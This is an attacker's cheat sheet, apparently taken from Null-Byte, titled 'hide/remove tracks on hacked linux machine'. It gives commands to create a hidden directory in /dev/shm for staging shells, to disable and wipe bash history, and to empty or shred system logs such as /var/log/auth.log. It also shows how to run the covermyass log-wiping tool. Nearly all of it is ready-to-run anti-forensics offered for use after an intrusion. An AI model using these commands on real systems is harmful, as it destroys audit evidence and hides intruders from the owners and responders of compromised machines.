hide/remove tracks on hacked linux machine

1. ----------------------------------------------------------------------
2. _____ _
3. ( _ ) _ ( )_
4. | (_) | ___ _ ___ _ _ ___ ___ (_)| ,_) _ _
5. | _ |/' _ `\ /'_`\ /' _ `\( ) ( )/' _ ` _ `\| || | ( ) ( )
6. | | | || ( ) |( (_) )| ( ) || (_) || ( ) ( ) || || |_ | (_) |
7. (_) (_)(_) (_)`\___/'(_) (_)`\__, |(_) (_) (_)(_)`\__)`\__, |
8. ( )_| | ( )_| |
9. `\___/' `\___/'
10.  
11. A comprehensive guide on how to remove system presence on a
12. hacked linux machine / server. Source: Null-Byte
13. ----------------------------------------------------------------------
14. CREATE SECRET DIRECTORY
15. ----------------------------------------------------------------------
16. # Depending on privileges, search for all
17. # directory(s) you have rights to write to.
18.  
19. find / -perm -222 -type d 2>/dev/null
20.  
21. # Find a directory of choice and create a
22. # hidden sub-directory inside
23.  
24. mkdir /dev/shm/.secret
25.  
26. # To list directory content, use the command:
27.  
28. ls -l /dev/shm/.secret
29.  
30. # You can also use the below statement to
31. # view the hidden sub-directory(s)
32.  
33. ls -la /dev/shm/
34.  
35. # This hidden directory is designed to write code,
36. # upload modules, shells, etc. Once finished, you
37. # can delete it via...
38.  
39. rm -rf /dev/shm/.secret
40.  
41. ----------------------------------------------------------------------
42. REMOVE BASH COMMAND HISTORY
43. ----------------------------------------------------------------------
44. # You can use the 'history' command to view all
45. # statements and commands used in the current
46. # bash session. History is written to the HISTFILE
47. # environment variable, which is usually '.bash_history'
48. # By typing...
49.  
50. echo $HISTFILE
51.  
52. # ...you can view where it is stored for certain.
53. # Type the following statement to purge history:
54.  
55. unset HISTFILE
56.  
57. # To confirm history has been overwritten, you can use
58. # either of the statements found below:
59.  
60. HISTFILE=/dev/null
61. export HISTFILE=/dev/null
62.  
63. # You can also set the number of commands to zero
64. # by using either of the following statements:
65.  
66. HISTSIZE=0
67. export HISTSIZE=0
68.  
69. # ...or you can limit the number of lines allowed in the
70. # file. Both lines below can be utilized:
71.  
72. HISTFILESIZE=0
73. export HISTFILESIZE=0
74.  
75. # You may also want to disable history outright. This can be
76. # suspicious but is an alternative.
77.  
78. set +o history
79.  
80. # You can re-enable with the following command:
81.  
82. set -o history
83.  
84. # Additionally, you can use the 'shopt' command to enable/disable:
85.  
86. Disable: shopt -ou history
87. Enable: shopt -os history
88.  
89. # To clear the history, you can input:
90.  
91. history -c
92.  
93. # ...then to write changes to disk, enter:
94.  
95. history -w
96.  
97. # The 'history -c' will only be affective for the current
98. # session. To make sure history is cleared completely when
99. # exiting shell, input:
100.  
101. cat /dev/null > ~/.bash_history && history -c && exit
102.  
103. # The 'kill' command will allow you to exit shell without
104. # saving history also. Input as follows:
105.  
106. kill -9 $$
107. ----------------------------------------------------------------------
108. CLEARING LOG FILES
109. ----------------------------------------------------------------------
110. # There are various system logs stored in linux systems.
111. # Here are some of the following...
112.  
113. # /var/log/auth.log Authentication
114. # /var/log/cron.log Cron Jobs
115. # /var/log/maillog Mail
116. # /var/log/httpd Apache
117.  
118. # You can remove a log w/ the 'rm' command. This however
119. # will likely raise suspicion. The more favorable choice is
120. # to clear the log without deleting the log file:
121.  
122. truncate -s 0 /var/log/<YOUR_LOG>
123.  
124. # Truncate is not always available on systems. If not, the
125. # same result can be accomplished by entering in any of the
126. # command statements below:
127.  
128. echo '' > /var/log/<YOUR_LOG>
129. > /var/log/<YOUR_LOG>
130. shred /var/log/<YOUR_LOG>
131. shred -zu /var/log/<YOUR_LOG>
132. cat /dev/null > /var/log/<YOUR_LOG>
133. true | tee /var/log/<YOUR_LOG>
134. dd if=/dev/null of=/var/log/<YOUR_LOG>
135. ----------------------------------------------------------------------
136. AUTOMATION OF PRESENCE REMOVAL
137. ----------------------------------------------------------------------
138. # To make secure deletion and removal of system presence, you
139. # are able to use CoverMyAss at: github.com/sundowndev/covermyass
140. # It utilizes 'wget' and will work as long as there's internet access.
141.  
142. # Find a writable direcotry, the use 'chmod' to make it executable:
143.  
144. chmod +x covermyass
145.  
146. # ...then execute it:
147.  
148. ./covermyass
149.  
150. # In case of needing a quick exit, enter in:
151.  
152. ./covermyass now
153. ----------------------------------------------------------------------